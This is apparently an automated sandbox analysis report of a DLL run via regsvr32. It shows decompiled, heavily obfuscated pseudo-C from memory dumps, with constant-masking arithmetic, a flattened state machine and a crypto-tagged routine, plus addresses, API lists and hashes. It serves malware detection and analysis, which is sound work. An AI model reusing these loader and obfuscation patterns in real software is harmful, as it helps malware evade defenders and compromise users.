				_v308 = 0xf31b8c;
				_v308 = _v308 + 0xffff7d63;
				_v308 = _v308 ^ 0x00fa7e08;
				_v324 = 0xa3a541;
				_v324 = _v324 / _t464;
				_v324 = _v324 + 0xffffb9fb;
				_v324 = _v324 ^ 0x00092197;
				_v288 = 0xafceae;
				_t470 = 0x11;
				_v288 = _v288 / _t469;
				_v288 = _v288 ^ 0x0009256b;
				_v352 = 0x8368dd;
				_v352 = _v352 * 0x37;
				_v352 = _v352 + 0xf111;
				_v352 = _v352 ^ 0x1c31299e;
				_v360 = 0x93e8e3;
				_v360 = _v360 << 9;
				_v360 = _v360 >> 7;
				_v360 = _v360 + 0xffff991c;
				_v360 = _v360 ^ 0x00482730;
				_v336 = 0xc9e97b;
				_v336 = _v336 / _t470;
				_v336 = _v336 >> 9;
				_v336 = _v336 ^ 0x000bb3d6;
				_v328 = 0x6721bc;
				_v328 = _v328 + 0xc80e;
				_v328 = _v328 + 0x3b7b;
				_v328 = _v328 ^ 0x006a4f33;
				_v348 = 0xc42cda;
				_t471 = 0x26;
				_v348 = _v348 / _t471;
				_v348 = _v348 ^ 0x07a9868c;
				_v348 = _v348 ^ 0x07a63b60;
				_v312 = 0x83133f;
				_t472 = 0x7c;
				_v312 = _v312 / _t472;
				_v312 = _v312 ^ 0x000460a5;
				_v300 = 0xa90de3;
				_v300 = _v300 + 0xffff5a37;
				_v300 = _v300 ^ 0x00ab5298;
				_v376 = 0x35ce0b;
				_v376 = _v376 | 0xce696ea2;
				_v376 = _v376 ^ 0x16deb549;
				_t473 = 0x51;
				_v376 = _v376 / _t473;
				_v376 = _v376 ^ 0x02a46a16;
				_v304 = 0x3e9d4d;
				_v304 = _v304 + 0xe521;
				_v304 = _v304 ^ 0x0031f39c;
				_v400 = 0xea62a9;
				_t474 = 0x14;
				_v400 = _v400 / _t474;
				_v400 = _v400 | 0xcfe4802c;
				_v400 = _v400 + 0xbf26;
				_v400 = _v400 ^ 0xcffca5cf;
				_v320 = 0x8f32ff;
				_v320 = _v320 + 0xf17a;
				_v320 = _v320 >> 0x10;
				_v320 = _v320 ^ 0x00006336;
				_v292 = 0xdea761;
				_v292 = _v292 >> 7;
				_v292 = _v292 ^ 0x000c8ae3;
				_v404 = 0x88837d;
				_v404 = _v404 + 0xc8ed;
				_v404 = _v404 + 0xb0d9;
				_v404 = _v404 | 0xeb4d0789;
				_v404 = _v404 ^ 0xebc5e62d;
				_v368 = 0x263fc8;
				_v368 = _v368 / _t474;
				_t475 = 0x3f;
				_v368 = _v368 / _t475;
				_v368 = _v368 + 0xffff85d7;
				_v368 = _v368 ^ 0xfff46b0a;
				_v316 = 0x402bcc;
				_v316 = _v316 / _t464;
				_v316 = _v316 | 0x00697475;
				_v316 = _v316 ^ 0x00682b6d;
				_v392 = 0x87c396;
				_v392 = _v392 >> 0xf;
				_v392 = _v392 >> 1;
				_v392 = _v392 ^ 0x1da0870c;
				_v392 = _v392 ^ 0x1da1d2b7;
				_v340 = 0xcc8454;
				_v340 = _v340 | 0x5a668767;
				_v340 = _v340 >> 2;
				_v340 = _v340 ^ 0x16b4bb08;
				_v296 = 0xcfd00d;
				_v296 = _v296 ^ 0xf6c64667;
				_v296 = _v296 ^ 0xf6039208;
				_v396 = 0x8344f7;
				_v396 = _v396 >> 9;
				_v396 = _v396 + 0xffff279f;
				_t476 = _v344;
				_v396 = _v396 * 0x66;
				_v396 = _v396 ^ 0xffc04bfa;
				_v284 = 0xe4aeb4;
				_v284 = _v284 << 0xd;
				_v284 = _v284 ^ 0x95d420a0;
				_v332 = 0xf0d813;
				_v332 = _v332 << 0xc;
				_v332 = _v332 << 9;
				_v332 = _v332 ^ 0x02640735;
				_v388 = 0xdf613;
				_v388 = _v388 << 0x10;
				_v388 = _v388 >> 5;
				_v388 = _v388 + 0xe335;
				_v388 = _v388 ^ 0x07b10334;
				_v384 = 0xbd5abb;
				_v384 = _v384 * 0x3d;
				_v384 = _v384 >> 0xe;
				_v384 = _v384 * 0x2e;
				_v384 = _v384 ^ 0x002069ec;
				while(1) {
					L1:
					do {
						while(1) {
							L2:
							_t482 = _t410 - 0x63389f6;
							if(_t482 > 0) {
								break;
							}
							if(_t482 == 0) {
								_t383 = E10019184( &_v264, _a20, _v292, _v404, _v368);
								_t479 = _t479 + 0xc;
								if(_t383 != 0) {
									_t467 = 0xbbb9b;
									_t407 = 1;
								}
								_t410 = 0x3b968e9;
								while(1) {
									L1:
									goto L2;
								}
							} else {
								if(_t410 == 0xe24333) {
									if(_v276 >= _v384) {
										_t385 = E100195A8( &_v280,  &_v272);
									} else {
										_t385 = E100227DF( &_v280);
									}
									_t476 = _t385;
									_t375 = 0x2a106ff;
									_t410 =  !=  ? 0x2a106ff : 0xd0ebc27;
									continue;
								} else {
									if(_t410 == _t375) {
										_push(1);
										_t424 = 0x40;
										_push(E1000D763(_t424));
										_push(_v312);
										_push( &_v256);
										_t425 = 0xb;
										E1001DF4E(_t425, _v348);
										_t479 = _t479 - 0xc + 0x1c;
										_t410 = 0x482f540;
										while(1) {
											L1:
											goto L2;
										}
									} else {
										if(_t410 == 0x3b968e9) {
											E10006A8D(_v316, _v392, _v264);
											goto L11;
										} else {
											if(_t410 != 0x482f540) {
												goto L35;
											} else {
												_t405 = E1000A01C( *((intOrPtr*)(( *0x10025088)[4] + 0x42)), _v376,  *(( *0x10025088)[4] + 0x40) & 0x0000ffff, _t476,  &_v264,  &_v272, _v304,  &_v256, _v400, ( *0x10025088)[4] + 0x10, _v320);
												_t479 = _t479 + 0x28;
												if(_t405 == 0) {
													_t467 = 0x74d7c64;
													L11:
													_t410 = 0xd0ebc27;
													while(1) {
														L1:
														goto L2;
													}
												} else {
													_t410 = 0x63389f6;
													while(1) {
														L1:
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L38:
							return _t407;
						}
						if(_t410 == 0x74d7c64) {
							_t411 =  *0x10025088;
							_t372 =  *(_t411[4] + 0x30);
							 *_t411 =  *_t411 + 1;
							_t452 =  *_t411;
							_t411[4] = _t372;
							if(_t372 == 0) {
								_t411[4] = _t411[9];
							}
							if(_t452 >= ( *0x10025088)[6]) {
								 *( *0x10025088) = _v356;
							} else {
								_t410 = 0x7762430;
								goto L34;
							}
						} else {
							if(_t410 == 0x7762430) {
								_t476 = 0;
								E1000B184( &_v256, _v372, 0x100, _v380, _v308);
								_t479 = _t479 + 0xc;
								_v272 = _v272 & 0;
								_t410 = 0xa224f36;
								_v280 = _v280 & 0;
								_v268 = _v344;
								_v276 = _v364;
								goto L1;
							} else {
								if(_t410 == 0xa224f36) {
									_t320 =  &_v324; // 0x682b6d
									_t379 = E100147D2( &_v280, _t477,  *_t320, _v288, _a12);
									_t479 = _t479 + 0xc;
									if(_t379 != 0) {
										_t410 = 0xe24333;
										while(1) {
											L1:
											goto L2;
										}
									}
								} else {
									if(_t410 == 0xd0ebc27) {
										E10006A8D(_v340, _v296, _v280);
										E10006A8D(_v396, _v284, _t476);
										E10006A8D(_v332, _v388, _v272);
										_t410 = _t467;
										L34:
										_t375 = 0x2a106ff;
									}
									goto L35;
								}
							}
						}
						goto L38;
						L35:
					} while (_t410 != 0xbbb9b);
					goto L38;
				}
			}

0x10001b13
0x10001b1a
0x10001b1c
0x10001b23
0x10001b2a
0x10001b31
0x10001b38
0x10001b39
0x10001b3a
0x10001b3f
0x10001b47
0x10001b51
0x10001b53
0x10001b5a
0x10001b5b
0x10001b5f
0x10001b67
0x10001b6f
0x10001b77
0x10001b7c
0x10001b81
0x10001b89
0x10001b91
0x10001b99
0x10001ba9
0x10001baf
0x10001bb7
0x10001bc4
0x10001bc7
0x10001bca
0x10001bce
0x10001bd6
0x10001bde
0x10001be6
0x10001bee
0x10001bf6
0x10001bfe
0x10001c03
0x10001c0b
0x10001c13
0x10001c1b
0x10001c23
0x10001c33
0x10001c37
0x10001c3f
0x10001c47
0x10001c5b
0x10001c5c
0x10001c63
0x10001c6e
0x10001c7b
0x10001c7f
0x10001c87
0x10001c8f
0x10001c97
0x10001c9c
0x10001ca1
0x10001ca9
0x10001cb3
0x10001cc3
0x10001cc7
0x10001ccc
0x10001cd4
0x10001cdc
0x10001ce4
0x10001cec
0x10001cf4
0x10001d02
0x10001d07
0x10001d0b
0x10001d13
0x10001d1b
0x10001d29
0x10001d2e
0x10001d32
0x10001d3a
0x10001d42
0x10001d4a
0x10001d52
0x10001d5a
0x10001d62
0x10001d70
0x10001d75
0x10001d79
0x10001d81
0x10001d89
0x10001d91
0x10001d99
0x10001da7
0x10001dac
0x10001db0
0x10001db8
0x10001dc0
0x10001dc8
0x10001dd0
0x10001dd8
0x10001ddd
0x10001de5
0x10001df0
0x10001df8
0x10001e03
0x10001e0b
0x10001e13
0x10001e1b
0x10001e23
0x10001e2b
0x10001e3b
0x10001e45
0x10001e4a
0x10001e4e
0x10001e56
0x10001e5e
0x10001e6c
0x10001e70
0x10001e78
0x10001e80
0x10001e88
0x10001e8d
0x10001e91
0x10001e99
0x10001ea1
0x10001ea9
0x10001eb1
0x10001eb6
0x10001ebe
0x10001ec9
0x10001ed4
0x10001edf
0x10001ee7
0x10001eec
0x10001ef9
0x10001f01
0x10001f05
0x10001f0d
0x10001f18
0x10001f20
0x10001f2b
0x10001f33
0x10001f38
0x10001f3d
0x10001f45
0x10001f4d
0x10001f52
0x10001f57
0x10001f5f
0x10001f67
0x10001f74
0x10001f78
0x10001f82
0x10001f86
0x10001f8e
0x10001f8e
0x10001f93
0x10001f93
0x10001f93
0x10001f93
0x10001f99
0x00000000
0x00000000
0x10001f9f
0x10002105
0x1000210a
0x1000210f
0x10002113
0x10002118
0x10002118
0x10002120
0x10001f8e
0x10001f8e
0x00000000
0x10001f8e
0x10001fa5
0x10001fab
0x100020bd
0x100020cd
0x100020bf
0x100020bf
0x100020bf
0x100020d2
0x100020db
0x100020e0
0x00000000
0x10001fb1
0x10001fb3
0x10002075
0x1000207c
0x10002082
0x10002083
0x10002095
0x10002098
0x10002099
0x1000209e
0x100020a1
0x10001f8e
0x10001f8e
0x00000000
0x10001f8e
0x10001fb9
0x10001fbf
0x1000205d
0x00000000
0x10001fc5
0x10001fcb
0x00000000
0x10001fd1
0x10002029
0x1000202e
0x10002033
0x1000203f
0x10002044
0x10002044
0x10001f8e
0x10001f8e
0x00000000
0x10001f8e
0x10002035
0x10002035
0x10001f8e
0x10001f8e
0x00000000
0x10001f8e
0x10001f8e
0x10002033
0x10001fcb
0x10001fbf
0x10001fb3
0x10001fab
0x1000226f
0x10002278
0x10002278
0x10002130
0x10002221
0x1000222a
0x1000222d
0x1000222f
0x10002231
0x10002236
0x1000223b
0x1000223b
0x10002246
0x1000226a
0x10002248
0x10002248
0x00000000
0x10002248
0x10002136
0x1000213c
0x100021dc
0x100021eb
0x100021f4
0x100021f7
0x100021fe
0x10002203
0x1000220a
0x10002215
0x00000000
0x10002142
0x10002148
0x100021b3
0x100021b7
0x100021bc
0x100021c1
0x100021c7
0x10001f8e
0x10001f8e
0x00000000
0x10001f8e
0x10001f8e
0x1000214a
0x10002150
0x10002168
0x1000217a
0x1000218f
0x10002195
0x1000224d
0x1000224d
0x1000224d
0x00000000
0x10002150
0x10002148
0x1000213c
0x00000000
0x10002252
0x10002252
0x00000000
0x1000225e

Strings

3C, xrefs: 100021C7
k%, xrefs: 10001C63
3C, xrefs: 10001FA5
6c, xrefs: 10001DDD
!, xrefs: 10001D89
m+h6c, xrefs: 100021B3
0'H, xrefs: 10001CA9
6O", xrefs: 10002142
i , xrefs: 10001F86
3Oj, xrefs: 10001CEC
5, xrefs: 10001F57
6O", xrefs: 100021FE

Memory Dump Source

Source File: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.421096489.0000000010000000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.421354772.0000000010024000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !$0'H$3C$3C$3Oj$5$6O"$6O"$6c$k%$m+h6c$i
API String ID: 0-2181255642
Opcode ID: 19892aa550425589cf5c655f44789ba5a3fc72b2da37ca8c506336a268b5bbc5
Instruction ID: 0b0a7c8d181b42d63b08f7c0628f44b37e06f3f8cf06ddb9563e2d4057356867
Opcode Fuzzy Hash: 19892aa550425589cf5c655f44789ba5a3fc72b2da37ca8c506336a268b5bbc5
Instruction Fuzzy Hash: 9D0243715083819FE364CF65C489A9FBBE1FBC4398F20891DF68986264D7B1D889CF42

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4CD09 Relevance: 15.1, APIs: 10, Instructions: 125
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E6DA4CD09(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t45;
				long _t46;
				CHAR* _t50;
				CHAR* _t55;
				void* _t57;
				int _t63;
				CHAR* _t73;
				void* _t86;
				void* _t89;
				CHAR* _t91;
				long _t93;
				void* _t94;
				CHAR* _t99;
				CHAR* _t101;

				_t89 = __edx;
				_push(0x158);
				E6DA5C876(E6DA6E93E, __ebx, __edi, __esi);
				_t91 =  *(_t94 + 8);
				_t45 =  *(_t94 + 0xc);
				_t73 =  *(_t94 + 0x10);
				_t99 = _t91;
				_t75 = 0 | _t99 != 0x00000000;
				 *(_t94 - 0x158) = _t45;
				if(_t99 != 0) {
					L2:
					_t101 = _t45;
					_t75 = 0 | _t101 != 0x00000000;
					if(_t101 != 0) {
						goto L1;
					}
					_t77 = _t94 - 0x15c;
					_t93 = 0x104;
					_t46 = GetFullPathNameA(_t45, 0x104, _t91, _t94 - 0x15c);
					if(_t46 != 0) {
						__eflags = _t46 - 0x104;
						if(__eflags < 0) {
							E6DA212E0(_t94 - 0x154);
							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
							E6DA4CB4B(_t73, __eflags, _t91, _t94 - 0x154);
							_t50 = PathIsUNCA( *(_t94 - 0x154));
							__eflags = _t50;
							if(_t50 != 0) {
								L21:
								E6DA21430( &(( *(_t94 - 0x154))[0xfffffffffffffff0]));
								__eflags = 1;
								goto L22;
							}
							_t55 = GetVolumeInformationA( *(_t94 - 0x154), _t50, _t50, _t50, _t94 - 0x164, _t94 - 0x160, _t50, _t50);
							__eflags = _t55;
							if(_t55 != 0) {
								__eflags =  *(_t94 - 0x160) & 0x00000002;
								if(( *(_t94 - 0x160) & 0x00000002) == 0) {
									CharUpperA(_t91);
								}
								__eflags =  *(_t94 - 0x160) & 0x00000004;
								if(( *(_t94 - 0x160) & 0x00000004) == 0) {
									_t57 = FindFirstFileA( *(_t94 - 0x158), _t94 - 0x150);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										goto L21;
									}
									FindClose(_t57);
									__eflags =  *(_t94 - 0x15c);
									if( *(_t94 - 0x15c) == 0) {
										goto L11;
									}
									__eflags =  *(_t94 - 0x15c) - _t91;
									if( *(_t94 - 0x15c) <= _t91) {
										goto L11;
									}
									_t63 = lstrlenA(_t94 - 0x124);
									_t86 =  *(_t94 - 0x15c) - _t91;
									__eflags = _t63 + _t86 - _t93;
									if(_t63 + _t86 >= _t93) {
										__eflags = _t73;
										if(_t73 != 0) {
											_t73[8] = 3;
											E6DA21340( &(_t73[0x10]),  *(_t94 - 0x158));
										}
										L12:
										E6DA21430( &(( *(_t94 - 0x154))[0xfffffffffffffff0]));
										goto L5;
									}
									__eflags = _t93;
									E6DA461E3(_t89,  *(_t94 - 0x15c), _t93, _t94 - 0x124);
								}
								goto L21;
							}
							L11:
							E6DA4CCDA(_t73,  *(_t94 - 0x158));
							goto L12;
						}
						__eflags = _t73;
						if(_t73 != 0) {
							_t73[8] = 3;
							E6DA21340( &(_t73[0x10]),  *(_t94 - 0x158));
						}
						goto L5;
					} else {
						E6DA4347D(_t77, _t91, 0x104,  *(_t94 - 0x158), 0xffffffff);
						E6DA4CCDA(_t73,  *(_t94 - 0x158));
						L5:
						L22:
						return E6DA5C8F9(_t73, _t91, _t93);
					}
				}
				L1:
				_t45 = E6DA44898(_t75);
				goto L2;
			}

0x6da4cd09
0x6da4cd09
0x6da4cd13
0x6da4cd18
0x6da4cd1b
0x6da4cd1e
0x6da4cd23
0x6da4cd25
0x6da4cd28
0x6da4cd30
0x6da4cd37
0x6da4cd39
0x6da4cd3b
0x6da4cd40
0x00000000
0x00000000
0x6da4cd42
0x6da4cd4a
0x6da4cd51
0x6da4cd59
0x6da4cd80
0x6da4cd82
0x6da4cda5
0x6da4cdaa
0x6da4cdb6
0x6da4cdc1
0x6da4cdc7
0x6da4cdc9
0x6da4ce8d
0x6da4ce96
0x6da4ce9d
0x00000000
0x6da4ce9d
0x6da4cde8
0x6da4cdee
0x6da4cdf0
0x6da4ce11
0x6da4ce18
0x6da4ce1b
0x6da4ce1b
0x6da4ce21
0x6da4ce28
0x6da4ce37
0x6da4ce3d
0x6da4ce40
0x00000000
0x00000000
0x6da4ce43
0x6da4ce49
0x6da4ce50
0x00000000
0x00000000
0x6da4ce52
0x6da4ce58
0x00000000
0x00000000
0x6da4ce61
0x6da4ce6d
0x6da4ce71
0x6da4ce73
0x6da4cea6
0x6da4cea8
0x6da4ceb7
0x6da4cebe
0x6da4cebe
0x6da4cdfe
0x6da4ce07
0x00000000
0x6da4ce07
0x6da4ce7c
0x6da4ce85
0x6da4ce8a
0x00000000
0x6da4ce28
0x6da4cdf2
0x6da4cdf9
0x00000000
0x6da4cdf9
0x6da4cd84
0x6da4cd86
0x6da4cd91
0x6da4cd98
0x6da4cd98
0x00000000
0x6da4cd5b
0x6da4cd65
0x6da4cd74
0x6da4cd79
0x6da4ce9e
0x6da4cea3
0x6da4cea3
0x6da4cd59
0x6da4cd32
0x6da4cd32
0x00000000

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA4CD13
GetFullPathNameA.KERNEL32(00000000,00000104,00000000,?,00000158,6DA4CFB2,?,00000000,?), ref: 6DA4CD51

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

_DebugHeapAllocator.LIBCPMTD ref: 6DA4CD98
PathIsUNCA.SHLWAPI(?), ref: 6DA4CDC1
GetVolumeInformationA.KERNEL32 ref: 6DA4CDE8
CharUpperA.USER32 ref: 6DA4CE1B
FindFirstFileA.KERNEL32(?,?), ref: 6DA4CE37
FindClose.KERNEL32(00000000), ref: 6DA4CE43
lstrlenA.KERNEL32(?), ref: 6DA4CE61
_DebugHeapAllocator.LIBCPMTD ref: 6DA4CEBE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocatorDebugFindHeapPath$CharCloseException@8FileFirstFullH_prolog3_InformationNameThrowUpperVolumelstrlen
String ID:
API String ID: 511526410-0
Opcode ID: 187dad516fbf5bcd4766513574228f24fcad129845a350faed991d615d421cae
Instruction ID: c3106466cec1eeb6455cedf09be145c7b64e277814681458d4fa945d9fcbcfee
Opcode Fuzzy Hash: 187dad516fbf5bcd4766513574228f24fcad129845a350faed991d615d421cae
Instruction Fuzzy Hash: 9041E47690C62ADBDF118F61CD48BFF7B78AF46315F048198E91DA6280DB319AD8CE10

Uniqueness

Uniqueness Score: -1.00%

Function 100195A8 Relevance: 14.4, Strings: 11, Instructions: 637
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E100195A8(intOrPtr* __ecx, signed int __edx) {
				char _v128;
				char _v256;
				char _v288;
				signed int _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				unsigned int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				unsigned int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _t676;
				void* _t681;
				signed int _t683;
				int _t710;
				void* _t725;
				signed int _t730;
				signed int _t732;
				intOrPtr* _t737;
				void* _t741;
				void* _t742;
				void* _t747;
				void* _t748;
				void* _t749;
				signed int _t751;
				void* _t759;
				void* _t760;
				void* _t801;
				signed int _t813;
				signed int _t817;
				signed int _t818;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				void* _t836;
				void* _t839;
				void* _t843;
				signed int _t845;
				signed int* _t846;
				void* _t848;
				void* _t849;
				void* _t854;

				_t846 =  &_v556;
				_v304 = __edx;
				_v468 = __ecx;
				_v292 = _v292 & 0x00000000;
				_v296 = 0xf768fa;
				_v428 = 0xfd317;
				_v428 = _v428 + 0xffffc5b2;
				_v428 = _v428 + 0xffff527c;
				_v428 = _v428 ^ 0x0000b876;
				_v492 = 0x4b2ae8;
				_v492 = _v492 + 0x4bc2;
				_v492 = _v492 ^ 0x738c1878;
				_v492 = _v492 + 0xd9c3;
				_v492 = _v492 ^ 0x73c94cdb;
				_v356 = 0x8545f2;
				_v356 = _v356 + 0xffffeccf;
				_v356 = _v356 ^ 0x00880a5f;
				_v436 = 0x3c4905;
				_v436 = _v436 >> 4;
				_v436 = _v436 + 0xff86;
				_v436 = _v436 ^ 0x000abff0;
				_v476 = 0x44d1bc;
				_v476 = _v476 ^ 0x810326b6;
				_v476 = _v476 + 0xb83b;
				_v476 = _v476 + 0xffff395b;
				_v476 = _v476 ^ 0x814fcdd0;
				_v484 = 0x61c17b;
				_v484 = _v484 ^ 0xd135a825;
				_t839 = 0x2a971b8;
				_t817 = 0x6c;
				_v484 = _v484 / _t817;
				_v484 = _v484 >> 0xd;
				_v484 = _v484 ^ 0x0006db45;
				_v496 = 0xf531e4;
				_t818 = 0x38;
				_v496 = _v496 * 6;
				_v496 = _v496 | 0xe5860a3d;
				_v496 = _v496 + 0x7f90;
				_v496 = _v496 ^ 0xe5b0d3d9;
				_v544 = 0xd5111d;
				_v544 = _v544 + 0xffffc5e7;
				_v544 = _v544 | 0x4c9d575e;
				_v544 = _v544 + 0x2b20;
				_v544 = _v544 ^ 0x4cd6121c;
				_v464 = 0xd91318;
				_v464 = _v464 * 0x45;
				_v464 = _v464 / _t818;
				_v464 = _v464 << 1;
				_v464 = _v464 ^ 0x021edbf2;
				_v416 = 0x5d4702;
				_v416 = _v416 + 0xb537;
				_t819 = 0x3f;
				_v416 = _v416 * 0x50;
				_v416 = _v416 ^ 0x1d54c0cd;
				_v536 = 0xe8f42c;
				_v536 = _v536 / _t819;
				_v536 = _v536 + 0x29a2;
				_v536 = _v536 + 0xfffff1b5;
				_v536 = _v536 ^ 0x0004ea8d;
				_v360 = 0xd77e9;
				_v360 = _v360 | 0x1332023a;
				_v360 = _v360 ^ 0x13376576;
				_v400 = 0x260832;
				_v400 = _v400 + 0x52b6;
				_v400 = _v400 >> 8;
				_v400 = _v400 ^ 0x000d26d2;
				_v520 = 0x9279a9;
				_v520 = _v520 + 0xffff91bc;
				_t820 = 0x32;
				_v520 = _v520 * 0x22;
				_v520 = _v520 | 0x77bbf62b;
				_v520 = _v520 ^ 0x77fac947;
				_v432 = 0x9caa6d;
				_v432 = _v432 >> 3;
				_v432 = _v432 << 7;
				_v432 = _v432 ^ 0x09c1834f;
				_v352 = 0x88d159;
				_v352 = _v352 ^ 0x7f72832b;
				_v352 = _v352 ^ 0x7ff9200b;
				_v424 = 0xcd5998;
				_v424 = _v424 ^ 0x561e6a7b;
				_v424 = _v424 << 8;
				_v424 = _v424 ^ 0xd3379a94;
				_v512 = 0xb75933;
				_v512 = _v512 ^ 0x3a0b98f3;
				_v512 = _v512 + 0xffff7f82;
				_v512 = _v512 ^ 0xbf878a8b;
				_v512 = _v512 ^ 0x8533fe94;
				_v316 = 0x7b4102;
				_v316 = _v316 | 0xf5d10a44;
				_v316 = _v316 ^ 0xf5f91f76;
				_v456 = 0xe000cc;
				_v456 = _v456 | 0x0ff38739;
				_v456 = _v456 << 2;
				_v456 = _v456 ^ 0x1c627c28;
				_v456 = _v456 ^ 0x23af0e1f;
				_v384 = 0x41bbcd;
				_v384 = _v384 + 0xbac7;
				_v384 = _v384 + 0xdbcc;
				_v384 = _v384 ^ 0x004e20cb;
				_v344 = 0x5a69c0;
				_v344 = _v344 + 0xffffc3de;
				_v344 = _v344 ^ 0x0059195b;
				_v368 = 0xab68ba;
				_v368 = _v368 | 0xcbcf69a5;
				_v368 = _v368 ^ 0xcbed7751;
				_v440 = 0xba9a0b;
				_v440 = _v440 ^ 0x9cca13d7;
				_v440 = _v440 * 0x3d;
				_v440 = _v440 ^ 0x46d44438;
				_v480 = 0x50f6bc;
				_v480 = _v480 + 0xffff3ce7;
				_v480 = _v480 + 0xffff2790;
				_v480 = _v480 * 0x6a;
				_v480 = _v480 ^ 0x20d90945;
				_v392 = 0xe37cfb;
				_v392 = _v392 + 0xffffeef1;
				_v392 = _v392 + 0xffff3cc1;
				_v392 = _v392 ^ 0x00e67f57;
				_v448 = 0x1fdb9d;
				_v448 = _v448 >> 3;
				_v448 = _v448 + 0x8dc3;
				_v448 = _v448 ^ 0x000f18c3;
				_v324 = 0x282b30;
				_t218 =  &_v324; // 0x282b30
				_v324 =  *_t218 / _t820;
				_v324 = _v324 ^ 0x0008d3a0;
				_v552 = 0x8f44ed;
				_v552 = _v552 + 0xffff08af;
				_v552 = _v552 | 0x0cf3743d;
				_v552 = _v552 * 0x16;
				_v552 = _v552 ^ 0x1dfae824;
				_v336 = 0xfb0aa2;
				_v336 = _v336 | 0x81cab166;
				_v336 = _v336 ^ 0x81fc3ee1;
				_v504 = 0xd55cdf;
				_t821 = 0x70;
				_v504 = _v504 / _t821;
				_v504 = _v504 + 0x165a;
				_v504 = _v504 << 1;
				_v504 = _v504 ^ 0x0002fd86;
				_v488 = 0xcfcb93;
				_t822 = 0x50;
				_v488 = _v488 * 0x73;
				_v488 = _v488 + 0xffff7636;
				_v488 = _v488 / _t822;
				_v488 = _v488 ^ 0x01202d3f;
				_v528 = 0x8ce1d7;
				_t823 = 0x62;
				_v528 = _v528 * 0x34;
				_v528 = _v528 + 0xffff23e1;
				_v528 = _v528 / _t823;
				_v528 = _v528 ^ 0x004ce195;
				_v532 = 0x4d9ea3;
				_v532 = _v532 + 0x9177;
				_t824 = 0x43;
				_v532 = _v532 * 0x7f;
				_v532 = _v532 * 0x5d;
				_v532 = _v532 ^ 0x175828a1;
				_v320 = 0xe96b31;
				_t289 =  &_v320; // 0xe96b31
				_v320 =  *_t289 * 0x72;
				_v320 = _v320 ^ 0x67f8a117;
				_v540 = 0x5ff62e;
				_v540 = _v540 << 0xa;
				_v540 = _v540 + 0x5800;
				_v540 = _v540 ^ 0x09972f88;
				_v540 = _v540 ^ 0x76426b92;
				_v548 = 0xa32c90;
				_v548 = _v548 ^ 0xbf39720a;
				_v548 = _v548 ^ 0x1fab6343;
				_v548 = _v548 | 0x63fa4d22;
				_v548 = _v548 ^ 0xe3f91a82;
				_v364 = 0x69fb13;
				_v364 = _v364 + 0xffffd2c7;
				_v364 = _v364 ^ 0x006127ff;
				_v312 = 0x218f32;
				_v312 = _v312 | 0xbdeefc78;
				_v312 = _v312 ^ 0xbde28730;
				_v328 = 0xf0901d;
				_v328 = _v328 << 2;
				_v328 = _v328 ^ 0x03c28813;
				_v524 = 0xa402d5;
				_v524 = _v524 * 0x4d;
				_v524 = _v524 >> 9;
				_v524 = _v524 + 0x4738;
				_v524 = _v524 ^ 0x00181cfa;
				_v444 = 0xdf3db6;
				_v444 = _v444 | 0x5b526342;
				_v444 = _v444 / _t824;
				_v444 = _v444 ^ 0x0157433c;
				_v408 = 0xe5214e;
				_t347 =  &_v408; // 0xe5214e
				_v408 =  *_t347 * 0x64;
				_v408 = _v408 + 0x7f16;
				_v408 = _v408 ^ 0x5986c00d;
				_v500 = 0xe3fc2b;
				_v500 = _v500 ^ 0x68d85da5;
				_v500 = _v500 ^ 0x6a2e2b8f;
				_t825 = 0x7a;
				_v500 = _v500 / _t825;
